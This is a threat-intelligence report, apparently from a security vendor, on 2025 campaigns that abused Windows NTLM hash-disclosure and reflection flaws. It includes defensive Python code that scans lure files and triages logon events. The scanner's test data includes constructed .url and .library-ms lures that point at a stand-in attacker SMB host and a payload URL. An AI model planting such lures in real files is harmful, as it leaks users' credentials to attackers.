Executive Summary
In 2025, a wave of advanced persistent threat campaigns exploited a string of Microsoft Windows NTLM weaknesses, impacting organizations across Latin America, Russia, and Central Asia. Threat actors such as BlindEagle and Head Mare leveraged newly disclosed flaws (including CVE-2024-43451, CVE-2025-24054, and CVE-2025-33073) to force victims' machines to authenticate to attacker-controlled servers via crafted files delivered by phishing email, capturing NTLMv2 challenge-responses that can be cracked offline or relayed, and to deploy malware remotely. High-profile incidents included Remcos RAT and AveMaria Trojan infections following targeted spear-phishing, lateral movement using pass-the-hash with NT hashes dumped from compromised hosts, and abuse of man-in-the-middle and reflection vulnerabilities to gain SYSTEM-level access.
These incidents underscore the urgent risks posed by legacy protocols—despite Microsoft's announced deprecation of NTLM, it remains widely deployed, giving attackers room to refine credential relay and privilege escalation tactics. The ongoing threat highlights the necessity for rapid protocol retirement, proactive device auditing, regular patching, and adoption of stronger authentication frameworks to defend against evolving identity-driven attacks.
Why This Matters Now
The spike in NTLM-focused attacks and fresh CVEs in 2024–2025 shows that legacy authentication remains a major enterprise risk. As attackers weaponize new exploits within days of disclosure and combine credential theft with malware delivery, organizations face escalating pressure to remove NTLM from production, improve lateral-movement detection, and close compliance gaps before attackers exploit them.
Attack Path Analysis
The attack begins with phishing emails delivering malicious .url or .library-ms files. When Explorer renders such a file it connects to the remote path embedded in it and silently authenticates with NTLM, leaking the user's NTLMv2 challenge-response to an attacker-controlled server, or the lure fetches and runs a remote payload. Captured responses are cracked offline or relayed to services that do not enforce signing or channel binding, and NTLM reflection (CVE-2025-33073) turns a coerced machine authentication into SYSTEM-level access on the victim host, from which credentials are extracted from LSASS memory. Attackers then move laterally using pass-the-hash, Impacket tools, or stolen tokens to access other systems. Once established, remote access Trojans communicate with attacker-controlled infrastructure for command and control. Data and credentials are exfiltrated using native protocols or downloaded malware modules, and the attack culminates in malware deployment (such as Remcos RAT or PhantomCore), cryptocurrency theft, or establishing persistence for future impact.
Kill Chain Progression
Initial Compromise
Description
Phishing emails containing crafted .url or .library-ms files exploit NTLM flaws, resulting in either the download and execution of RATs (e.g., Remcos, AveMaria) or silent leakage of the user's NTLMv2 challenge-response to an attacker-controlled SMB or WebDAV server. The leak is triggered by Explorer rendering or parsing the file, not by the user opening it.
Related CVEs
CVE-2024-43451
CVSS 6.5
NTLM hash disclosure (spoofing) vulnerability in Microsoft Windows. Minimal interaction with a specially crafted .url file, such as selecting it, right-clicking it or deleting it, makes Explorer connect to the remote path embedded in the shortcut and disclose the user's NTLMv2 challenge-response to the attacker's server, which can then be cracked offline or relayed.
Affected Products:
Microsoft Windows – Multiple Versions
Exploit Status:
exploited in the wild
CVE-2025-24054
CVSS 6.5
NTLM hash disclosure (spoofing) vulnerability in Microsoft Windows. A malicious .library-ms file discloses the NTLMv2 challenge-response when Explorer parses it, for example on extraction from an archive or simply when the folder containing it is displayed; exploitation was observed within days of the March 2025 patch release.
Affected Products:
Microsoft Windows – Multiple Versions
Exploit Status:
exploited in the wild
CVE-2025-24071
CVSS 6.5
NTLM hash disclosure (spoofing) vulnerability in Microsoft Windows, closely related to CVE-2025-24054: Explorer parses a malicious .library-ms file as soon as it is extracted from an archive and authenticates to the SMB path it contains, disclosing the user's NTLMv2 challenge-response.
Affected Products:
Microsoft Windows – Multiple Versions
Exploit Status:
exploited in the wild
CVE-2025-33073
CVSS 8.8
Elevation of privilege vulnerability in the Microsoft Windows SMB client. An attacker who coerces a victim host into authenticating to an attacker-controlled hostname can reflect that NTLM authentication back to the victim's own SMB server and obtain SYSTEM-level execution; hosts that enforce SMB signing are not affected.
Affected Products:
Microsoft Windows – Multiple Versions
Exploit Status:
exploited in the wild
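The four CVEs above share one delivery artifact: a .url or .library-ms file that names a remote location which Explorer resolves, and authenticates to, before the user opens anything. The following scanner is an added example written for this page (not code from the report or from any of the cited sources) that parses both formats and flags such locations. The sample files are constructed, and 198.51.100.7 is a documentation address standing in for an attacker host. A plain URL=http(s):// entry is deliberately not flagged: every benign shortcut looks like that, and it leaks nothing by itself.

```python
"""Static scan of .url and .library-ms lures for remote locations (added example)."""
import configparser
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# UNC path: \\host\share, including the WebDAV redirector form \\host@80\share
UNC_RE = re.compile(r"^\\\\[^\\]+")
# Namespace of the .library-ms XML schema
LIBRARY_NS = "{http://schemas.microsoft.com/windows/2009/library}"
# .url keys Explorer resolves without the user opening the shortcut
URL_KEYS = ("iconfile", "url", "workingdirectory")


def is_remote_location(location: str) -> bool:
    """True if resolving this location would make Windows contact another host."""
    loc = location.strip().strip('"')
    if UNC_RE.match(loc):
        return True
    parsed = urlparse(loc)
    scheme = parsed.scheme.lower()
    if scheme == "file":  # file://host/share or file:////host/share
        return bool(parsed.netloc) or parsed.path.startswith("//")
    return scheme in {"smb", "webdav", "dav", "davs"} and bool(parsed.netloc)


def scan_url_file(text: str) -> list[dict]:
    """Flag .url fields that point at a remote path (icon, target or working dir)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return []
    return [{"field": key, "value": value, "risk": "ntlm-leak"}
            for key, value in cp.items("InternetShortcut")
            if key in URL_KEYS and is_remote_location(value)]


def scan_library_file(text: str) -> list[dict]:
    """Flag <url> and <iconReference> elements of a .library-ms that are remote."""
    root = ET.fromstring(text)
    findings = []
    for tag in ("url", "iconReference"):
        for el in root.iter(LIBRARY_NS + tag):
            if el.text and is_remote_location(el.text):
                findings.append({"field": tag, "value": el.text.strip(), "risk": "ntlm-leak"})
    return findings


def scan_file(name: str, text: str) -> list[dict]:
    """Dispatch on extension. Real lures are often UTF-16 or carry a BOM, so read
    them with open(path, encoding="utf-8-sig") or decode UTF-16 before calling."""
    lower = name.lower()
    if lower.endswith(".url"):
        return scan_url_file(text)
    if lower.endswith(".library-ms"):
        return scan_library_file(text)
    return []


# Constructed lure: the icon lives on an SMB server, so Explorer sends the user's
# NTLMv2 response to 198.51.100.7 while merely drawing the shortcut.
LURE_URL = r"""[InternetShortcut]
URL=http://198.51.100.7/update/payload.exe
IconFile=\\198.51.100.7\share\icon.ico
IconIndex=1
"""

# Constructed benign shortcut for comparison: local icon, ordinary HTTPS target.
BENIGN_URL = r"""[InternetShortcut]
URL=https://intranet.example.test/
IconFile=C:\Windows\System32\shell32.dll
IconIndex=13
"""

# Constructed .library-ms whose search location is an attacker SMB share.
LURE_LIBRARY = r"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\198.51.100.7\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

if __name__ == "__main__":
    for name, text in (("invoice.url", LURE_URL), ("readme.url", BENIGN_URL),
                       ("Documents.library-ms", LURE_LIBRARY)):
        print(name, scan_file(name, text))
```

Run it over a mail gateway's quarantine or an archive extraction directory; any ntlm-leak finding in inbound mail is a lure regardless of which CVE it targets, since the patches change what Explorer does with the path, not the fact that the file carries one.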
MITRE ATT&CK® Techniques
Phishing: Spearphishing Attachment (T1566.001)
Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay (T1557.001)
Use Alternate Authentication Material: Pass the Hash (T1550.002)
Forced Authentication (T1187)
Valid Accounts (T1078)
OS Credential Dumping: LSASS Memory (T1003.001)
Lateral Tool Transfer (T1570)
Application Layer Protocol: Web Protocols (T1071.001)
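The pass-the-hash and NTLM-reflection stages of the attack path both leave a footprint in Windows Security event 4624 on the target host: a network logon (type 3) authenticated by the NTLM package. The triage below is an added example for this page, not code from the report or its sources. It builds a baseline of which accounts reach which hosts over NTLM during a clean learning window, then raises three kinds of alert: NTLMv1 being accepted, a machine account authenticating to its own host over the network from a remote address (the shape of the CVE-2025-33073 reflection), and an account's first NTLM logon to a host. The event records are constructed; field names follow the 4624 EventData schema, and the baseline window and address conventions are assumptions.

```python
"""Triage of Windows Security 4624 events for NTLM misuse (added example)."""
from collections import defaultdict

# Source addresses that mean "this host talking to itself", not a remote relay.
LOCAL_SOURCES = {"", "-", "127.0.0.1", "::1"}


def is_ntlm_network_logon(ev: dict) -> bool:
    """Logon type 3 (network) authenticated by the NTLM package."""
    return (ev.get("EventID") == 4624
            and str(ev.get("LogonType")) == "3"
            and ev.get("AuthenticationPackageName", "").upper() == "NTLM")


def short_host(fqdn: str) -> str:
    """Computer field is usually an FQDN; machine accounts use the short name."""
    return fqdn.split(".")[0].upper()


def build_baseline(history: list[dict]) -> dict[str, set[str]]:
    """Hosts each account reached over NTLM during a clean learning window."""
    seen = defaultdict(set)
    for ev in history:
        if is_ntlm_network_logon(ev):
            seen[ev["TargetUserName"].lower()].add(short_host(ev["Computer"]))
    return seen


def _alert(rule: str, ev: dict, why: str) -> dict:
    return {"rule": rule, "user": ev["TargetUserName"], "host": short_host(ev["Computer"]),
            "src": ev.get("IpAddress", ""), "why": why}


def triage(events: list[dict], baseline: dict[str, set[str]]) -> list[dict]:
    alerts = []
    for ev in events:
        if not is_ntlm_network_logon(ev):
            continue
        user, host, src = ev["TargetUserName"], short_host(ev["Computer"]), ev.get("IpAddress", "")
        # NTLMv1 accepted means the server's LmCompatibilityLevel is below 5;
        # NTLMv1 responses are trivially cracked or relayed.
        if ev.get("LmPackageName", "").upper() == "NTLM V1":
            alerts.append(_alert("ntlmv1", ev, "server accepted an NTLMv1 response"))
        # A machine account logging on to its own host over the network via NTLM
        # from a remote address is the shape of NTLM reflection: the host's coerced
        # authentication is relayed straight back to it.
        if user.upper() == host + "$" and src not in LOCAL_SOURCES:
            alerts.append(_alert("ntlm-reflection", ev,
                                 "machine account authenticated to its own host over NTLM from " + src))
        # An account reaching a host it never used over NTLM before is the usual
        # footprint of pass-the-hash; WorkstationName is often the attacker's box.
        elif host not in baseline.get(user.lower(), set()):
            alerts.append(_alert("new-ntlm-path", ev,
                                 f"first NTLM logon of {user} to {host}; "
                                 f"workstation={ev.get('WorkstationName', '')}"))
    return alerts


def event(**fields) -> dict:
    """Constructed 4624 record with defaults typical of an NTLMv2 network logon."""
    base = {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
            "LmPackageName": "NTLM V2", "LogonProcessName": "NtLmSsp",
            "WorkstationName": "", "IpAddress": "-"}
    base.update(fields)
    return base


# Constructed clean week: alice works from WS42 against FILE01, backup service hits FILE01.
HISTORY = [
    event(Computer="FILE01.corp.example", TargetUserName="alice", WorkstationName="WS42", IpAddress="10.0.0.42"),
    event(Computer="FILE01.corp.example", TargetUserName="svc_backup", WorkstationName="BKP01", IpAddress="10.0.0.9"),
]

# Constructed events under investigation.
EVENTS = [
    # Kerberos logon: not NTLM, ignored.
    event(Computer="HR-SQL01.corp.example", TargetUserName="alice",
          AuthenticationPackageName="Kerberos", LmPackageName="-", IpAddress="10.0.0.42"),
    # Baselined NTLM use: no alert.
    event(Computer="FILE01.corp.example", TargetUserName="svc_backup", WorkstationName="BKP01", IpAddress="10.0.0.9"),
    # alice's NT hash replayed from an unknown workstation against a new host.
    event(Computer="HR-SQL01.corp.example", TargetUserName="alice", WorkstationName="KALI", IpAddress="10.0.0.77"),
    # NTLMv1 accepted by a legacy file server.
    event(Computer="LEGACY01.corp.example", TargetUserName="bob", LmPackageName="NTLM V1",
          WorkstationName="WS17", IpAddress="10.0.0.17"),
    # WS42's machine account authenticating to WS42 itself from the attacker address.
    event(Computer="WS42.corp.example", TargetUserName="WS42$", WorkstationName="KALI", IpAddress="10.0.0.77"),
]


def run_example() -> list[dict]:
    return triage(EVENTS, build_baseline(HISTORY))


if __name__ == "__main__":
    for a in run_example():
        print(f"[{a['rule']}] {a['user']} -> {a['host']} from {a['src']}: {a['why']}")
```

The new-ntlm-path rule is noisy until the baseline has seen a full business cycle, so treat it as a hunting lead rather than a paging alert; the ntlmv1 and ntlm-reflection rules are rare enough to page on. Pair this server-side view with the client-side NTLM audit log (Microsoft-Windows-NTLM/Operational, events 8001 to 8004) that the "Network security: Restrict NTLM" audit policies produce, which shows which processes on a workstation initiated outbound NTLM and to which targets.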
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Authentication Vulnerability Management
Control ID: 8.2.2
NYDFS 23 NYCRR 500 – Risk Assessment and Access Privileges
Control ID: 500.03/06/14
DORA (Digital Operational Resilience Act) – ICT Risk Management and Protection
Control ID: Art. 9(2), Art. 10(1)
CISA Zero Trust Maturity Model 2.0 – Phasing Out Legacy Authentication Protocols
Control ID: Identity Pillar: Authentication Protection
NIS2 Directive – Technical and Organizational Measures: Access Control
Control ID: Art. 21(2), Annex I(2)(c)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
NTLM credential harvesting attacks directly threaten banking systems with lateral movement, privilege escalation, and compliance violations against the PCI DSS, NYDFS 500 and DORA requirements listed above.
Banking/Mortgage
APT groups exploiting NTLM vulnerabilities can compromise authentication systems, enabling unauthorized access to financial data and regulatory compliance failures.
Government Administration
State-sponsored attacks targeting government entities through NTLM relay exploits enable privileged access escalation and sensitive information exfiltration capabilities.
Health Care / Life Sciences
NTLM authentication vulnerabilities expose patient data systems to credential theft, violating HIPAA requirements and enabling healthcare network compromise.
Sources
- Old tech, new vulnerabilities: NTLM abuse, ongoing exploitation in 2025 (Kaspersky Securelist): https://securelist.com/ntlm-abuse-in-2025/118132/
- CVE-2025-24054, NTLM Exploit in the Wild (Check Point Research): https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
- CISA Warns of Actively Exploited Windows NTLM Vulnerability (Cyber Press): https://cyberpress.org/cisa-warns-windows-ntlm/
- Microsoft’s guidance to help mitigate critical threats to Active Directory Domain Services in 2025 (Microsoft Windows Server Blog): https://www.microsoft.com/en-us/windows-server/blog/2025/12/09/microsofts-guidance-to-help-mitigate-critical-threats-to-active-directory-domain-services-in-2025
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Integrated Zero Trust segmentation, east-west traffic monitoring, policy-based egress controls, and network-layer encryption would have constrained NTLM attack paths, limiting credential theft, lateral movement, and data exfiltration while improving detection and rapid response.
Control: Cloud Firewall (ACF)
Mitigation: Malicious inbound file hosting and C2 domains can be blocked, reducing initial malware infections.
Control: Zero Trust Segmentation
Mitigation: Network segmentation restricts abuse of legacy protocols and sensitive targets even with compromised hashes.
Control: East-West Traffic Security
Mitigation: Lateral movement paths between workloads are tightly controlled, preventing unauthorized pivots.
Control: Egress Security & Policy Enforcement
Mitigation: Outbound C2 communications to unapproved domains/IPs are denied or alerted.
Control: Encrypted Traffic (HPE)
Mitigation: Sensitive data in motion is encrypted, and anomalous unencrypted egress can be flagged.
Rapid detection of covert tools and abnormal behaviors enables faster incident response.
Impact at a Glance
Affected Business Functions
- Authentication Services
- Network Security
- User Access Management
Estimated downtime: 5 days
Estimated loss: $500,000
Potential exposure of user credentials, leading to unauthorized access and data breaches.
Recommended Actions
Key Takeaways & Next Steps
- Accelerate full NTLM deprecation and enforce strong identity governance to eliminate legacy authentication risks; where NTLM cannot yet be removed, set LmCompatibilityLevel to 5, require SMB signing and enable Extended Protection for Authentication so that leaked responses cannot be relayed.
- Apply Zero Trust segmentation and east-west policy controls to prevent credential replay and lateral movement, especially around sensitive systems.
- Deploy strict cloud egress filtering and cloud firewalling to intercept malicious outbound communications and C2 activity; block outbound SMB (TCP 445) and WebDAV to the internet, which stops the forced-authentication leak regardless of the lure format.
- Enhance encrypted traffic enforcement and monitor for any anomalous unencrypted traffic, especially SMB/WebDAV flows.
- Integrate network-centric threat detection and baselining to rapidly identify and respond to credential misuse, malware drops, and persistence mechanisms.